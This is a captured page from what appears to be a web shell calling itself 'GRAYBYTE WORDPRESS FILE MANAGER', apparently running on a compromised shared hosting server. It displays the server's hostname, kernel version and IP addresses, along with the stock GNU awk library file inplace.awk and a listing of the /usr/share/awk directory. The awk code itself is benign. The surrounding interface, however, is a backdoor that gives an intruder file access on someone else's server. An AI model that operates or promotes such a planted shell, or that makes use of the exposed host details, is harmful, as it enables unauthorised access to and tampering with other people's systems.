✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium134.web-hosting.com ​🇻​♯➤ 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 162.0.232.104 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.120
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/share/awk//inplace.awk
# inplace --- load and invoke the inplace extension.
# 
# Copyright (C) 2013, 2017 the Free Software Foundation, Inc.
# 
# This file is part of GAWK, the GNU implementation of the
# AWK Programming Language.
# 
# GAWK is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# 
# GAWK is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
#
# Andrew J. Schorr, aschorr@telemetry-investments.com
# January 2013

@load "inplace"

# Please set INPLACE_SUFFIX to make a backup copy.  For example, you may
# want to set INPLACE_SUFFIX to .bak on the command line or in a BEGIN rule.

# By default, each filename on the command line will be edited inplace.
# But you can selectively disable this by adding an inplace=0 argument
# prior to files that you do not want to process this way.  You can then
# reenable it later on the commandline by putting inplace=1 before files
# that you wish to be subject to inplace editing.

# N.B. We call inplace_end() in the BEGINFILE and END rules so that any
# actions in an ENDFILE rule will be redirected as expected.

BEGIN {
    inplace = 1         # enabled by default
}

BEGINFILE {
    if (_inplace_filename != "")
        inplace_end(_inplace_filename, INPLACE_SUFFIX)
    if (inplace)
        inplace_begin(_inplace_filename = FILENAME, INPLACE_SUFFIX)
    else
        _inplace_filename = ""
}

END {
    if (_inplace_filename != "")
        inplace_end(_inplace_filename, INPLACE_SUFFIX)
}


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
8 Jun 2026 8.23 PM
root / root
0755
assert.awk
0.374 KB
25 Feb 2018 5.17 PM
root / root
0644
bits2str.awk
0.326 KB
25 Feb 2018 5.17 PM
root / root
0644
cliff_rand.awk
0.3 KB
25 Feb 2018 5.17 PM
root / root
0644
ctime.awk
0.229 KB
25 Feb 2018 5.17 PM
root / root
0644
ftrans.awk
0.308 KB
25 Feb 2018 5.17 PM
root / root
0644
getopt.awk
2.15 KB
25 Feb 2018 5.17 PM
root / root
0644
gettime.awk
2.433 KB
25 Feb 2018 5.17 PM
root / root
0644
group.awk
1.724 KB
18 Apr 2022 3.55 PM
root / root
0644
have_mpfr.awk
0.216 KB
25 Feb 2018 5.17 PM
root / root
0644
inplace.awk
1.949 KB
25 Feb 2018 5.17 PM
root / root
0644
intdiv0.awk
0.451 KB
25 Feb 2018 5.17 PM
root / root
0644
join.awk
0.369 KB
25 Feb 2018 5.17 PM
root / root
0644
libintl.awk
0.232 KB
25 Feb 2018 5.17 PM
root / root
0644
noassign.awk
0.412 KB
25 Feb 2018 5.17 PM
root / root
0644
ord.awk
0.915 KB
25 Feb 2018 5.17 PM
root / root
0644
passwd.awk
1.171 KB
18 Apr 2022 3.55 PM
root / root
0644
processarray.awk
0.347 KB
25 Feb 2018 5.17 PM
root / root
0644
quicksort.awk
1.007 KB
25 Feb 2018 5.17 PM
root / root
0644
readable.awk
0.478 KB
25 Feb 2018 5.17 PM
root / root
0644
readfile.awk
0.261 KB
25 Feb 2018 5.17 PM
root / root
0644
rewind.awk
0.395 KB
25 Feb 2018 5.17 PM
root / root
0644
round.awk
0.646 KB
25 Feb 2018 5.17 PM
root / root
0644
shellquote.awk
0.461 KB
25 Feb 2018 5.17 PM
root / root
0644
strtonum.awk
1.42 KB
25 Feb 2018 5.17 PM
root / root
0644
walkarray.awk
0.209 KB
25 Feb 2018 5.17 PM
root / root
0644
zerofile.awk
0.414 KB
25 Feb 2018 5.17 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF